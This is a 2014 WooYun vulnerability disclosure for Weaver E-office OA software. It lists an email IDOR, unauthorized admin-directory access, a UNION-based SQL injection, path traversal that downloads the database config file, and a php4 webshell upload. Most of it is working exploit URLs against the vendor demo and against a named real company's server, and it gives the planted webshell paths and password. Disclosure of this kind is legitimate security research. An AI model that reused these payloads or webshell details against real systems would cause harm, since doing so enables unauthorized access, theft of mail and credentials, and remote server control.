漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2014-074972
漏洞标题:泛微OA漏洞集合(sql注入、未授权访问等)
相关厂商:cncert国家互联网应急中心
漏洞作者: Coody
提交时间:2014-09-04 12:00
修复时间:2014-12-03 12:02
公开时间:2014-12-03 12:02
漏洞类型:SQL注射漏洞
危害等级:高
自评Rank:20
漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2014-09-04: 细节已通知厂商并且等待厂商处理中
2014-09-09: 厂商已经确认,细节仅向厂商公开
2014-09-12: 细节向第三方安全合作伙伴开放
2014-11-03: 细节向核心白帽子及相关领域专家公开
2014-11-13: 细节向普通白帽子公开
2014-11-23: 细节向实习白帽子公开
2014-12-03: 细节向公众公开
简要描述:
...
详细说明:
下面出现的漏洞,据我了解还没有人报过,千万别说又跟什么什么漏洞重复了(点绝对不同)!
WooYun: 泛微E-office OA管理系统# 验证其通用性:SQL注入、任意文件下载、文件上传等漏洞
这里通过(1)官方演示 (2)某一案例 来演示其通用型。
官方测试账户为 夏静,案例测试账户为 程琳。
问题链接:http://www.xxx.com/general/email/new/index.php?EMAIL_ID=7
问题参数:EMAIL_ID
问题说明:遍历参数EMAIL_ID的值,可查看他人邮件信息
漏洞证明:
(1)官方演示:
http://eoffice8.weaver.cn:8028/general/email/new/index.php?EMAIL_ID=9503
http://eoffice8.weaver.cn:8028/general/email/new/index.php?EMAIL_ID=9504
(2)案例演示:
http://www.sjd-logistics.com:8000/general/email/new/index.php?EMAIL_ID=726155
http://www.sjd-logistics.com:8000/general/email/new/index.php?EMAIL_ID=726152
问题链接:http://www.xxoo.com/ikernel/admin/
问题说明:登录该OA系统后,可访问ikernel目录,但是系统提示“没有权限操作”,此时可直接访问ikernel/admin/目录,可对表结构及表本身进行操作。
漏洞证明:
(1)官方演示:
有些显示的是乱码或显示不清楚,为方便截图进行了全选操作
(2)案例演示:
问题链接:http://www.xxx.com/ikernel/admin/IK_TABLE/field/?TABLE_ID=9
问题参数:TABLE_ID
问题说明:这里貌似好多都存在注入,测试中只选取一点。虽gpc为on,但是数字型的不影响。
漏洞证明:
(1)官方演示:
获取数据库当前用户 http://eoffice8.weaver.cn:8028/ikernel/admin/IK_TABLE/field/?TABLE_ID=9%20and%201=2%20union%20select%20user()
获取当前数据库名称 http://eoffice8.weaver.cn:8028/ikernel/admin/IK_TABLE/field/?TABLE_ID=9%20and%201=2%20union%20select%20database()
(2)案例演示:
获取数据库当前用户 http://www.sjd-logistics.com:8000/ikernel/admin/IK_TABLE/field/?TABLE_ID=9%20and%201=2%20union%20select%20user()
获取当前数据库名称 http://www.sjd-logistics.com:8000/ikernel/admin/IK_TABLE/field/?TABLE_ID=9%20and%201=2%20union%20select%20database()
问题链接:http://www.xxx.com/general/notify/show/header.php?ATTACHMENT_ID=1738682577&FILE_NAME=../../inc/oa_config.php
问题说明:下载是个zend加密的文件,可在网上进行解密。该文件中包含数据库链接文件。测试发现官方的已不是加密文件。
(1)官方演示:
http://eoffice8.weaver.cn:8028/general/notify/show/header.php?ATTACHMENT_ID=1738682577&FILE_NAME=../../inc/oa_config.php
(2)案例演示:
http://www.sjd-logistics.com:8000/general/notify/show/header.php?ATTACHMENT_ID=1738682577&FILE_NAME=../../inc/oa_config.php
问题链接:http://www.xxx.com/general/email/
问题说明:在【内部邮件】-【新建邮件】的附件处,可上传php4文件类型(官方demo中抓包改包可上传php4文件),通过查看源码找到对应的部分文件路径。最后webshell访问路径为 http://www.xxx.com/attachment/源码中找到的部分路径/文件名.php4
(1)官方演示:
得到的webshell地址为:http://eoffice8.weaver.cn:8028/attachment/1915193417/conf1g.php4 密码8
(2)案例演示:
得到的webshell地址为:http://www.sjd-logistics.com:8000/attachment/950753027/conf1g.php4 密码8
漏洞证明:
同上
修复方案:
版权声明:转载请注明来源 Coody@乌云
漏洞回应
厂商回应:
危害等级:高
漏洞Rank:20
确认时间:2014-09-09 08:51
厂商回复:
最新状态:
暂无